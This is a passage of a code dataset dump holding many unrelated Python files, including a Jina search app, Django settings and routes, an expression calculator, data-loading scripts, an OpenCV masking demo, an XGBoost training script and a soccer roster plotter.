(1/ratio)**(pos)*first_val\n","sub_path":"utils/collection_processing.py","file_name":"collection_processing.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"345084980","text":"import os\nimport sys\nimport click\nimport random\nfrom jina import Flow, Document, DocumentArray\nfrom jina.logging.predefined import default_logger as logger\n\nMAX_DOCS = int(os.environ.get('JINA_MAX_DOCS', 10000))\nJINA_PORT = str(45678)\ncur_dir = os.path.dirname(os.path.abspath(__file__))\nJINA_WORKSPACE = os.path.join(cur_dir, 'workspace')\ndef config():\n os.environ['JINA_DATA_FILE'] = os.environ.get('JINA_DATA_FILE', 'data.txt')\n os.environ['JINA_PORT'] = os.environ.get('JINA_PORT', JINA_PORT)\n cur_dir = os.path.dirname(os.path.abspath(__file__))\n os.environ.setdefault('JINA_WORKSPACE', os.path.join(os.path.join(cur_dir, 'jina-text'), 'workspace'))\n os.environ.setdefault('JINA_WORKSPACE_MOUNT',\n f'{os.environ.get(\"JINA_WORKSPACE\")}:/workspace/workspace')\n\n\n\ndef input_generator(num_docs: int, file_path: str):\n with open(file_path) as file:\n lines = file.readlines()\n num_lines = len(lines)\n random.shuffle(lines)\n for i in range(min(num_docs, num_lines)):\n yield Document(text=lines[i])\n\n\ndef index(num_docs):\n flow = Flow().load_config('flows/flow.yml')\n data_path = os.path.join(os.path.dirname(__file__), os.environ.get('JINA_DATA_FILE', None))\n with flow:\n flow.post(on='/index', inputs=input_generator(num_docs, data_path),\n show_progress=True)\ndef query_restful():\n flow = Flow.load_config('flows/flow.yml')\n flow.protocol = 'http'\n flow.port_expose = JINA_PORT \n with flow:\n flow.block()\n\n# def remove_workspace():\n# import subprocess\n# subprocess.run(f'cmd.exe /c start cmd.exe /c wsl.exe rm -R {JINA_WORKSPACE}', shell= True,timeout=10000)\n\n\n@click.command()\n@click.option(\n '--task',\n '-t',\n type=click.Choice(['index', 'query'], case_sensitive=False),\n)\n@click.option('--num_docs', '-n', default=MAX_DOCS)\n@click.option('--top_k', '-k', default=5)\ndef main(task, num_docs, top_k):\n config()\n if task == 'index':\n if os.path.exists(os.environ.get(\"JINA_WORKSPACE\")):\n logger.error(f'\\n +---------------------------------------------------------------------------------+ \\\n \\n | 🤖🤖🤖 | \\\n \\n | The directory {os.environ.get(\"JINA_WORKSPACE\")} already exists. Please remove it before indexing again. | \\\n \\n | 🤖🤖🤖 | \\\n \\n +---------------------------------------------------------------------------------+')\n sys.exit(1)\n index(num_docs)\n if task == 'query':\n query_restful()\n # if task == 'del':\n # remove_workspace()\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Backend/jina-text/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"338124186","text":"from . import views\nfrom django.urls import path,include\n\nurlpatterns = [\n path('',views.home,name='home' ),\n path('observation/',views.observation,name='observation' ),\n path('encounter/',views.encounter,name='encounter' ),\n path('jsonviewPatient//',views.jsonviewPatient, name='jsonviewPatient' ),\n path('jsonviewObservation//', views.jsonviewObservation, name='jsonviewObservation'),\n path('jsonviewEncounter//', views.jsonviewEncounter, name='jsonviewEncounter'),\n path('url/', views.url, name='url'),\n\n]","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"281844891","text":"# File : encircle_project.py\n# Programmer : Shakti Singla\n# Description : Program that acts as a simple calculator. Takes a single argument\n# as an expression and prints out the integer result of evaluating it.\n# There is no explicit limit in code to how deep expressions can be\n\nimport sys\n\ndef main_loop():\n \n try:\n expression = get_expression()\n if expression == 'exit' or expression == 'EXIT': # checking user input\n exit()\n solving(expression)\n\n except:\n print(\"Please Enter the Expression properly\") # Warning Message\n\n\n# Getting the expression from User\ndef get_expression():\n expression = sys.argv[1]\n return expression\n\n\n# Solving the expression\ndef solving(expression):\n while True: # Looping through all the brackets until we have only integer value left\n if expression.isnumeric() == False: # If expression is not only a single number\n a = expression[::-1].find('(')\n index1 = len(expression) - a - 1 # Solving from inner pair of round brackets while moving to outer ones\n b = expression[index1:].find(')') + index1\n index2 = b + 1 \n formatted_expression = formatting(expression[index1:index2])\n list1 = splitting(formatted_expression)\n answer = calculate(list1)\n expression = expression.replace(expression[index1:index2], str(answer))\n else:\n print(expression)\n break\n\n\n# Taking the expression out of the round brackets\ndef formatting(expression):\n expression = expression.replace(\"(\", \"\")\n expression = expression.replace(\")\", \"\")\n return expression\n\n\n# Splitting the expression and storing in a list\ndef splitting(expression):\n list1 = expression.split(\" \") # Creating list of one expression inside the round brackets\n return list1\n\n\n# Solving the arithmetic part of the expression\n# Support an arbitrary number of arguments to add and multiply\ndef calculate(list1):\n if list1[0] == \"ADD\" or list1[0] == \"add\":\n answer = 0\n for i in range(1, len(list1)): #\n answer = answer + int(list1[i])\n return answer\n elif list1[0] == \"MULTIPLY\" or list1[0] == \"multiply\":\n answer = 1\n for i in range(1, len(list1)):\n answer *= int(list1[i])\n return answer\n # We can can use more elif statements for other operands\n # like (*, /, etc..)\n # Need to take care of 0 in case of Division\n\nmain_loop()\n","sub_path":"encircle_project 2.py","file_name":"encircle_project 2.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190738918","text":"import sys, os\nfrom MetaDB import MetaDB\nfrom MetaDBExtension import MetaDBExtension\nimport getopt\nfrom sd_common import *\nfrom display_info import display_info\n\ndryrun = False\nverbose = False\n\ndef usage():\n\tusageinfo = ' Usage: python3 job_status.py [-t | -p ] [-r ] -d [-n -v]'\\\n\t\t\t\t+ \"\\n\\t-t => db1.tn1,db2.tn2... OR -p pid1,pid2...\"\\\n\t\t\t\t+ \"\\n\\t-d => target name\"\\\n\t\t\t\t+ \"\\n\\t-r => num records to display\"\\\n\t\t\t\t+ \"\\n\\t-o => order rows by [sub, pub]\"\\\n\t\t\t\t+ \"\\n\\t-v => verbose\"\\\n\t\t\t\t+ \"\\n\\t-n => dryrun mode\"\\\n\t\t\t\t+ \"\\nREFERENCE: https://confluence.paypal.com/display/PPDM/SD+Job+management+Utilities\"\n\tprint (usageinfo)\n\ndef process_args(args):\n\tglobal dryrun, verbose\n\ttry:\n\t\toptlist, args = getopt.getopt(args, 'vnt:p:r:d:o:')\n\texcept getopt.GetoptError: \n\t\tusage() \n\t\tsys.exit(2)\n\n\tnum_records = 20 # Default num to select\n\ttname_list = []\n\tpublishid_list = []\n\ttarg_list = ['all'] # Default all targets\n\torder_by = 'pub'\n\n\tfor (o, a) in optlist:\n\t\tif o == \"-t\" and len(tname_list) == 0:\n\t\t\ttname_list = [t for t in a.split(',')]\n\t\telif o == \"-p\" and len(publishid_list) == 0:\n\t\t\tpublishid_list = [int(pid) for pid in a.split(',')]\n\t\telif o == \"-r\":\n\t\t\tnum_records = a\n\t\telif o == \"-d\":\n\t\t\ttarg_list = a.split(\",\")\n\t\telif o == \"-n\":\n\t\t\tdryrun = True\n\t\t\tverbose = True\n\t\telif o == \"-v\":\n\t\t\tverbose = True\n\t\telif o == \"-o\":\n\t\t\tif a in ['pub', 'sub']:\n\t\t\t\torder_by = a\n\n\tif (len(tname_list) == 0 and len(publishid_list) == 0) or (len(targ_list) == 0):\n\t\tusage() \n\t\tsys.exit(2)\n\treturn (publishid_list, tname_list, num_records, targ_list, order_by)\n\t\n\t\nif __name__ == '__main__':\n\n\t(publishid_list, tname_list, num_records, targ_list, order_by) = process_args(sys.argv[1:])\n\tmdb = MetaDBExtension(os.path.basename(__file__))\n\n\tif len(publishid_list) == 0:\n\t\tpublishid_list = [find_publishid(mdb, tname) for tname in tname_list]\n\n\tfor publishid in publishid_list:\n\t\ttname = find_tname(mdb, publishid)\n\t\tif publishid < 0:\n\t\t\tmdb.close()\n\t\t\tsys.exit(\"Given table doesn't exist\")\n\n\t\tif (targ_list[0]) == 'all':\n\t\t\tactual_targ_list = find_active_targets(mdb, publishid)\n\t\t\tif len(actual_targ_list) == 0:\n\t\t\t\tsys.exit(\"No replication happening to targets for given publishid {p}\".format(p=publishid))\n\t\telse:\n\t\t\tactual_targ_list = targ_list\n\t\t\tfor targ in actual_targ_list:\n\t\t\t\tif not validate_syncsystem_name(mdb, targ):\n\t\t\t\t\tsys.exit('Not a valid syncsystem name: {name}'.format(name=targ))\n\n\t\t(updt_stgy, schedule_id) = mdb.select(\"select UpdateStrategy, scheduleId from syncpublish where publishid={p}\".format(p=publishid))[0]\n\n\t\tif order_by == 'pub':\n\t\t\tquery = \"check_job_status\"\n\t\telif order_by == 'sub':\n\t\t\tquery = \"check_job_status_orderby_target\"\n\n\t\tcheck_job_status_query = get_query(mdb, query).format(pid=publishid, rownum=num_records, targ_list=\",\".join([quote_str(t) for t in actual_targ_list]))\n\t\tprint(\"\\nPublishid:{p}\\tTableName={t}\\tUpdateStrategy={u}\\tscheduleId={s}\\ttargets:{targ}\"\\\n\t\t\t\t.format(p=publishid, t=tname, u=updt_stgy, s=schedule_id, targ=\",\".join(actual_targ_list)))\n\t\tverbose and print (\"Executing query:\\n{q}\\n\".format(q=check_job_status_query))\n\t\tdryrun or display_info(mdb, check_job_status_query)\n\t\tdryrun or log_audit_info(mdb, check_job_status_query, os.path.basename(__file__))\n\n\tmdb.close()\n","sub_path":"projects/steam_donkey/py/modules/job_management_utils/job_status.py","file_name":"job_status.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"86095444","text":"from .common import *\nDEBUG = True\nALLOWED_HOSTS = ['*']\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'pi-dal.db'),\n }\n}\nSECRET_KEY = '__8)+a)-nc_fwmz948eyv&n7l2uw-r70bb8q%@m_4f=y^9#der'\n\n","sub_path":"dal/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"459735070","text":"import sqlite3\nimport pandas as pd\nimport numpy as np\n\ndef bool2int(x):\n \"\"\"Convert a boolean value to an integer,if it\n is a bool. Else, return the original value.\"\"\"\n test = isinstance(x, (bool, np.bool_))\n if test:\n return int(x)\n else:\n return x\n\ndams_loc = pd.read_pickle('dams_df.pkl')\ndams_state = pd.read_pickle('dams_state.pkl')\n\nconn = sqlite3.connect(\"data/dams.db\")\ncursor = conn.cursor()\n\n# Create the table that will store the dam locations\nlocs_tbl = \"\"\"CREATE TABLE locations (\n Name VARCHAR(30) PRIMARY KEY NOT NULL,\n x REAL NOT NULL,\n y REAL NOT NULL\n )\"\"\"\ncursor.execute(locs_tbl)\n\n# populate the table with date from dams_loc\nloc_insert = \"\"\"INSERT OR REPLACE INTO locations (Name, x, y) VALUES (?,?,?)\"\"\"\ncursor.executemany(loc_insert, dams_loc.to_records(index=False))\n\n# Create the table that will store the state of dams\nstate_tbl = \"\"\"CREATE TABLE state (\n ID INTEGER PRIMARY KEY,\n Region VARCHAR(2) NOT NULL,\n Date VARCHAR(10) NOT NULL,\n Name VARCHAR(30) NOT NULL,\n River VARCHAR(30) NOT NULL,\n FSC REAL,\n This_week REAL,\n This_week_lda INT(1),\n Last_week REAL,\n Last_week_lda INT(1),\n Last_year REAL,\n Last_year_lda INT(1),\n FOREIGN KEY(Name) REFERENCES locations(Name)\n )\"\"\"\ncursor.execute(state_tbl)\n\n# Convert the boolean to and integer and the date to string\ndams_state = dams_state.applymap(lambda x: bool2int(x))\ndams_state.Date = dams_state.Date.map(lambda x: str(x))\n\n# populate the table with date from dams_state\nstate_insert = \"\"\"INSERT OR REPLACE INTO state\n (ID, Region, Date, Name, River, FSC,\n This_week, This_week_lda,\n Last_week, Last_week_lda,\n Last_year, Last_year_lda) VALUES (NULL, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);\"\"\"\ncursor.executemany(state_insert, dams_state.to_records(index=False))\n\nconn.commit()\ncursor.close()\nconn.close()\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"537407213","text":"#http://docs.opencv.org/3.1.0/d0/d86/tutorial_py_image_arithmetics.html\n#Code to pick up only outline of OpenCV Logo and add it to Messi5 image\n\nimport sys\nsys.path.append('/usr/local/lib/python2.7/site-packages')\n\n\nimport cv2\nimport numpy as np\n\n# Load two images\n\nimg1 = cv2.imread('/Users/sanketjain/Documents/OpenCV/02 Core Operations/Arithmetic Operations on Images/sanket.jpg')\nimg2 = cv2.imread('/Users/sanketjain/Documents/OpenCV/02 Core Operations/Arithmetic Operations on Images/opencvlogo.png')\nimg3 = cv2.imread('/Users/sanketjain/Documents/OpenCV/02 Core Operations/Arithmetic Operations on Images/BalloonImages.jpg')\n\n\n\n# I want to put logo on top-left corner, So I create a ROI\nrows,cols,channels = img2.shape\nroi = img1[0:rows, 0:cols ]\n\n# Now create a mask of logo and create its inverse mask also\nimg2gray = cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\nret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)\n# http://docs.opencv.org/3.1.0/d7/d4d/tutorial_py_thresholding.html#gsc.tab=0\nmask_inv = cv2.bitwise_not(mask)\n\n# Now black-out the area of logo in ROI\nimg1_bg = cv2.bitwise_and(roi,roi,mask = mask_inv)\n#cv2.imshow('mask',img1_bg)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n# Take only region of logo from logo image.\nimg2_fg = cv2.bitwise_and(img2,img3,mask = mask)\n#cv2.imshow('foreground',img2_fg)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n# Put logo in ROI and modify the main image\ndst = cv2.add(img1_bg,img2_fg)\nimg1[0:rows, 0:cols ] = dst\n\ncv2.imshow('res',img1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","sub_path":"02 Core Operations/Arithmetic Operations on Images/Core-Airth2.py","file_name":"Core-Airth2.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"87018093","text":"from moviepy.editor import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport struct\n\nf = open(\"out1.pcm\",'wb')\n\nname = \"VID_20200708_155406_00_026.insv\"\nv = VideoFileClip(name)\na = v.audio.to_soundarray()\n\n# a = AudioFileClip(\"shouji2.mp3\").to_soundarray();\n\na = a[:,1]\nb = []\nr = 44100/8000\nt = len(a)/44100\nfor i in range(int(8000*t)):\n\tb.append(a[int(i*r)])\nb = np.array(b) * 32000\nprint(max(b))\nf.write(b.astype('int16').tostring())\nf.close()\n\n# os.system(\"amodem recv -i out.pcm -o data.rx\")\n# f = open(\"data.rx\", \"rb\")\n# for i in range(5):\n# \tb = f.read(8)\n# \tt = struct.unpack('d', b)\n# \tprint(t)\n# f.close()\n# times = np.arange(len(a))/float(44100)\n# plt.fill_between(times, a[:,0])\n# plt.show()","sub_path":"read_sound.py","file_name":"read_sound.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"86483854","text":"\nclass NewPerson():\n def __init__(self, first_name, last_name, phone_number, email, role) -> None:\n self.first_name = first_name\n self.last_name = last_name\n self.phone_number = phone_number\n self.email = email\n self.role = role\n \n @staticmethod\n def from_json(data):\n return NewPerson(\n first_name = data.get('first_name'),\n last_name = data.get('last_name'),\n phone_number= data.get('phone_number'),\n email = data.get('email'),\n role = data.get('role'),\n )\n \nclass Person():\n def __init__(self, first_name, last_name, phone_number, email, role, created_at, updated_at) -> None:\n self.first_name = first_name\n self.last_name = last_name\n self.phone_number = phone_number\n self.email = email\n self.role = role\n self.created_at = created_at\n self.updated_at = updated_at\n \n @staticmethod\n def from_grpc_response(response):\n return Person(\n first_name = response.first_name,\n last_name = response.last_name,\n phone_number= response.phone_number,\n email = response.email,\n role = response.role,\n updated_at = response.updated_at,\n created_at = response.created_at\n )\n \n @staticmethod\n def from_grpc_response_list(response):\n person_list = []\n for person in response.person_list:\n person_list.append(Person.from_grpc_response(person).__dict__)\n return person_list\n \n\n \n","sub_path":"gateway/src/entities/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"634704700","text":"# BFS with early return\nclass Solution:\n def closestMeetingNode(self, edges: List[int], node1: int, node2: int) -> int:\n visited1, visited2 = set([node1]), set([node2])\n q1, q2, common = [node1], [node2], []\n def bfs(q, visited, visited2):\n child = []\n while q:\n node = q.pop()\n if node in visited2:\n common.append(node)\n if edges[node] != -1 and edges[node] not in visited:\n visited.add(edges[node])\n child.append(edges[node])\n return child\n while q1 and q2:\n q1, q2 = bfs(q1, visited1, visited2), bfs(q2, visited2, visited1)\n if common: return min(common)\n if q1: q1, visited1, visited2 = q1, visited1, visited2\n if q2: q1, visited1, visited2 = q2, visited2, visited1\n while q1:\n q1 = bfs(q1, visited1, visited2)\n if common: return min(common)\n return -1","sub_path":"2359. Find Closest Node to Given Two Nodes.py","file_name":"2359. Find Closest Node to Given Two Nodes.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"495544114","text":"import os, sys\nimport pandas as pd\nimport numpy as np\nimport time\nimport csv\n\nfrom sklearn.metrics import confusion_matrix\nimport dill as pickle\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef get_cm(y_true, y_pred):\n ind=np.isfinite(y_true.astype(np.float))\n return confusion_matrix(y_true[ind].astype(np.int32), y_pred[ind])\n\ndef get_sn_sp(cm):\n tn, fp, fn, tp = cm.ravel()\n sn = np.float(tp)/(tp+fn)\n sp = np.float(tn)/(tn+fp)\n return sn, sp\n\ndef get_qual_model_score(sn_train, sp_train, sn_test, sp_test):\n ba_train = (sn_train+sp_train)/2.\n ba_test = (sn_test+sp_test)/2.\n gof = (0.7*ba_train) + 0.3*(1-np.abs(sn_train-sp_train))\n pred = (0.7*ba_test) + 0.3*(1-np.abs(sn_test-sp_test))\n rob = 1-np.abs(ba_train-ba_test)\n s = (0.3*gof) + (0.45*pred) + (0.25*rob)\n return s\n\ndef file_updater(file_path, rows, mode='a'):\n\twith open(file_path, mode, newline='', encoding='utf-8') as f:\n\t\twriter=csv.writer(f)\n\t\tfor row in rows:\n\t\t\twriter.writerow(row)\n\nif __name__ == \"__main__\":\n\tload_folder = \"data\"\n\tscripts_folder = \"Scripts\"\n\tsys.path.append(scripts_folder)\n\n\tfrom AOTexperiment_helper import load_data, data_scaling\n\n\tfrom sklearn.metrics import confusion_matrix\n\tfrom sklearn.utils.class_weight import compute_sample_weight\n\tfrom tensorflow.keras.utils import to_categorical\n\n\timport xgboost as xgb\n\n\tdata_dict = load_data(\"data\")\n\ttrain_features = data_dict['train_features']\n\ttest_features = data_dict['test_features']\n\ttrain_targets = data_dict['train_targets']\n\ttest_targets = data_dict['test_targets']\n\ttrain_Fweights = data_dict['train_Fweights']\n\ttest_Fweights = data_dict['test_Fweights']\n\tlabels = data_dict['labels']\n\n\tfeature_scaler = StandardScaler()\n\ttarget_scaler = None\n\tbinary_labels = [0,1]\n\ttrain_features_scaled, test_features_scaled, train_targets_scaled, test_targets_scaled, feature_scaler, target_scaler = data_scaling(\n\t\tfeature_scaler,\n\t\ttarget_scaler, \n\t train_features, \n\t test_features, \n train_targets[:, binary_labels].astype(np.float32),\n test_targets[:, binary_labels].astype(np.float32) \n )\t\n\n\twith open(\"AOT_binary_xgb_params_optimizer.ob\", 'rb') as f:\n\t\tparams=pickle.load(f)\n\tparams= params['x']\n\n\tlearning_rate = params[0] \n\tn_estimators = params[1] \n\tmax_depth = params[2]\n\tmin_child_weight = params[3]\n\tgamma = params[4]\n\tsubsample = params[5]\n\tcolsample_bytree = params[6]\n\n\tsuper_folder = \"AOT_models\"\n\tfolder_name = \"_\".join([time.strftime(\"%y%m%d\", time.localtime()),\n\t\t\t\t\t\t\t\"xgboost\",\n\t\t\t\t\t\t\t\"binary\"]\n\t\t\t\t\t\t )\n\tsummary_csv_path = os.path.join(super_folder,\n\t\t\t\t\t\t\t\t\tfolder_name+\"_summary.csv\"\n\t\t\t\t\t\t\t\t\t)\t\n\theader = [\"Model\", \"Label\", \"Metric\", \"Type\", \"Score\"]\n\tfile_updater(summary_csv_path, [header], mode='w')\n\ttry: \n\t\tos.mkdir(os.path.join(super_folder, folder_name))\n\texcept:\n\t\tpass\n\t\t\n\tfor idx, label_idx in enumerate(binary_labels):\n\t\tprint(f\"Starting on {labels[label_idx]}\")\n\t\tvalid_train_ind = np.where(~np.isnan(train_targets_scaled[:,idx]))[0]\n\t\tvalid_test_ind = np.where(~np.isnan(test_targets_scaled[:, idx]))[0]\n\n\t\ty_train = train_targets_scaled[valid_train_ind, idx]\n\t\ty_test = test_targets_scaled[valid_test_ind, idx] \t\n\n\t\ttrain_sample_weight = compute_sample_weight(\"balanced\", y_train)\n\n\t\trgs = xgb.XGBClassifier(\n\t\t\tlearning_rate = learning_rate, \n\t\t\tn_estimators = n_estimators, \n\t\t\tmax_depth=max_depth,\n\t\t\tmin_child_weight=min_child_weight,\n\t\t\tgamma=gamma,\n\t\t\tsubsample=subsample,\n\t\t\tcolsample_bytree=colsample_bytree,\n\t\t\tobjective=\"reg:logistic\",\n\t\t\tn_jobs=-1, \n\t\t\t)\n\t\trgs.fit(train_features_scaled[valid_train_ind], \n\t\t\t\ty_train,\n\t\t\t\tsample_weight = train_sample_weight)\n\t\trgs.save_model(os.path.join(super_folder, folder_name, f\"xgb_model_{labels[label_idx]}\"))\n\n\t\tr = []\n\n\t\ttrain_predict = rgs.predict(train_features_scaled[valid_train_ind])\n\t\t# train_predict = to_categorical(train_predict)\n\t\ttest_predict = rgs.predict(test_features_scaled[valid_test_ind], )\n\t\t# test_predict = to_categorical(test_predict)\n\n\t\t# categorical_y_train = to_categorical(y_train)\n\n\t\t# diff = categorical_y_train.shape[1]-train_predict.shape[1]\n\t\t# if diff>0:\n\t\t# train_predict = np.hstack([train_predict, np.zeros((train_predict.shape[0], diff))])\n\t\t# diff = categorical_y_train.shape[1]-test_predict.shape[1]\n\t\t# if diff>0:\n\t\t# test_predict=np.hstack([test_predict,np.zeros((test_predict.shape[0], diff))])\n\n\t\t# cm_train = get_cm(categorical_y_train, train_predict)\n\t\tcm_train = get_cm(y_train, train_predict)\n\n\t\tsn_train, sp_train = get_sn_sp(cm_train)\n\t\tprint(f\"Label {labels[label_idx]}: train NER={np.mean([sn_train, sp_train]):.3f}, train Sensitivity={sn_train:.3f}, train Specificity={sp_train:.3f}.\")\n\t\tr.append([\"xgboost\", labels[label_idx], \"NER\", \"Train\", np.mean([sn_train, sp_train])])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Sensitivity\", \"Train\", sn_train])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Specificity\", \"Train\", sp_train])\n\n\t\t# cm_test = get_cm(to_categorical(y_test), test_predict)\n\t\tcm_test = get_cm(y_test, test_predict)\n\n\t\tsn_test, sp_test = get_sn_sp(cm_test)\n\t\tprint(f\"Label {labels[label_idx]}: test NER={np.mean([sn_test, sp_test]):.3f}, test Sensitivity={sn_test:.3f}, test Specificity={sp_test:.3f}.\")\n\t\tr.append([\"xgboost\", labels[label_idx], \"NER\", \"Test\", np.mean([sn_test, sp_test])])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Sensitivity\", \"Test\", sn_test])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Specificity\", \"Test\", sp_test])\n\n\t\tmodel_score = get_qual_model_score(sn_train, sp_train, sn_test, sp_test)\n\t\tr.append([\"xgboost\", labels[label_idx], \"model score\", \"TrainTest\", model_score])\n\t\tprint(f\"Label{labels[label_idx]}: model score={model_score:.3f}\")\n\n\t\tfile_updater(summary_csv_path, r, mode='a')\n\tsys.exit()","sub_path":"1_Notebooks/AOT_wFP/AOT_binary_xgb.py","file_name":"AOT_binary_xgb.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"502633031","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime as dt\nimport sys # args and exit\nimport re # match and remove ♀\nimport io # save plot to stream\nimport configparser # read google sheet url\n\n\ndef read_config(config_file=\"config.ini\"):\n config = configparser.ConfigParser()\n config.read(config_file)\n return(config)\n\n\ndef read_date(x):\n try:\n x = pd.to_datetime(x, format=\"%m/%d\")\n x = x.strftime(\"%m/%d\")\n except Exception:\n x = \"\"\n finally:\n return(x)\n\n\ndef game_roster(match_date, ngames=10, config_file=\"config.ini\"):\n \"\"\"\n 0. pull game roster from google sheets and clean it up a bit\n - remove junk rows (only take as many rows as there are games)\n - reformat date from m/d to mm/dd to match python's strftime\n 1. select only the row that matches the game date we provide\n \"\"\"\n gsheet = read_config(config_file)['roster']['tsv']\n df = pd.read_csv(gsheet, sep='\\t')[0:ngames]\n # make dates look like what python uses, so we can find game day\n # essentially just add 0 to 1 digit months\n df.loc[:, 'date'] = [read_date(x) for x in df.date]\n dayrow = df[df.date == match_date]\n\n return(dayrow)\n\n\ndef get_match_date(match_dow=6, week_offset=0):\n \"\"\"\n game_roster parsed google sheet encodes day like mm/dd\n find the next game day in mm/dd format\n input is the day of the week we have a match\n \"\"\"\n # when is our game (thursday=3)\n cur_dow = dt.datetime.now().weekday()\n days_to_match = match_dow-cur_dow if cur_dow <= match_dow else 7 - (cur_dow - match_dow)\n match_day_search_fmt = (dt.datetime.now() + dt.timedelta(days=days_to_match + 7*week_offset)).strftime(\"%m/%d\")\n return(match_day_search_fmt)\n\n\ndef dayrow_extract(dayrow):\n \"\"\"\n extract list of females (f), list of males (m), and total needed from dayrow\n - find the columns greater than 0, skip the first 6 columns\n - use that to get the number of players\n \"\"\"\n ignr = 4 # zero-based count of non-yes/no player cols (to ignore)\n players = dayrow.columns[\n [False]*ignr +\n (dayrow.iloc[:, ignr:] > 0).values.tolist()[0]\n ]\n # gals match '♀' in name\n gals = [not re.search('♀', x) is None for x in players]\n m = players[[not x for x in gals]]\n f = [re.sub(' *♀', '', x) for x in players[gals]]\n\n # size like 8v8, extract the first char (8) and make an int\n # need_n = int(dayrow['size'].values[0][0]) # 20180911 -- PSL all same size\n need_n = 7\n return({'f': f, 'm': m, 'need_n': need_n})\n\n\ndef draw_names(v, offset=0, color='black', adj=0):\n text_offset = .1 # how far to shift text over\n x = 1 # all on the vert pos.\n for i, n in enumerate(v):\n plt.text(x-text_offset, i+.2+offset,\n \"%d. %s\" % (i+1+offset-adj, n), color=color)\n\n\ndef plot_players(f, m, need_n):\n width = .3\n total = len(m) + len(f) # == dayrow.TOTAL.values[0]\n # cut posible range into colors red (too few), yellow (enough), green (have subs)\n fcolor = pd.cut([len(f)], [-pd.np.Inf,1,2,pd.np.Inf],labels=['red','yellow','green'])[0]\n mcolor = pd.cut([len(m)], [-pd.np.Inf,need_n-max(2,len(f))-1,need_n,pd.np.Inf],labels=['red','yellow','green'])[0]\n fig = plt.figure()\n\n # gap between m and f\n f_offset = len(m) + 1\n\n # color histogram. give .2 extra so empty will show (as red)\n plt.bar(1, len(m)+.2, width, color=mcolor)\n plt.bar(1, len(f)+.2, width, f_offset, color=fcolor)\n # show 2 above how many we have\n plt.ylim([-.2, total+2])\n # only show one x position\n plt.xlim([.5, 1.5])\n plt.axis('off')\n # place enumerated names on the bar\n draw_names(m, 0, 'black', 0)\n draw_names(f, f_offset, 'black', 1)\n #\n title = \"\\n\" +\\\n r'$\\frac{%d}{%d}$ = $\\frac{%d}{2}$♀ + $\\frac{%d}{%d}$♂ ' %\\\n (total, need_n, len(f), len(m), need_n - max(2, len(f)))\n plt.title(title, fontsize=20)\n fig.suptitle(\"as of \" + dt.datetime.now().strftime('%m/%d %H:%M'),\n fontsize=10)\n return(fig)\n\n\ndef stream_plot(fig):\n fig.tight_layout()\n imgdata = io.BytesIO()\n fig.savefig(imgdata, format='png')\n imgdata.seek(0)\n return(imgdata.read())\n\n\ndef most_recent_image():\n \"\"\"\n stdout buff wrie put it all together\n \"\"\"\n match_date = get_match_date()\n dayrow = game_roster(match_date)\n fig = plot_players(**dayrow_extract(dayrow))\n return(stream_plot(fig))\n\n\nif __name__ == \"__main__\":\n if(len(sys.argv) < 2):\n match_date = get_match_date()\n else:\n match_date = sys.argv[1]\n\n dayrow = game_roster(match_date)\n\n # error if we did not find exacltly one match\n if len(dayrow) != 1:\n print(\"did a bad job uniquely matching %s\" % match_date)\n sys.exit(1)\n\n fig = plot_players(**dayrow_extract(dayrow))\n sys.stdout.buffer.write(stream_plot(fig))\n","sub_path":"soccerimg.py","file_name":"soccerimg.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"398430723","text":"\"\"\"Module for Validation.\"\"\"\nfrom typing import List, Optional\n\nfrom ga4gh.vrsatile.pydantic.vrs_models import CopyChange\nfrom ga4gh.vrs.extras.translator import Translator\nfrom gene.query import QueryHandler as GeneQueryHandler\nfrom cool_seq_tool.data_sources import TranscriptMappings, SeqRepoAccess, UTADatabase, \\\n MANETranscript\n\nfrom 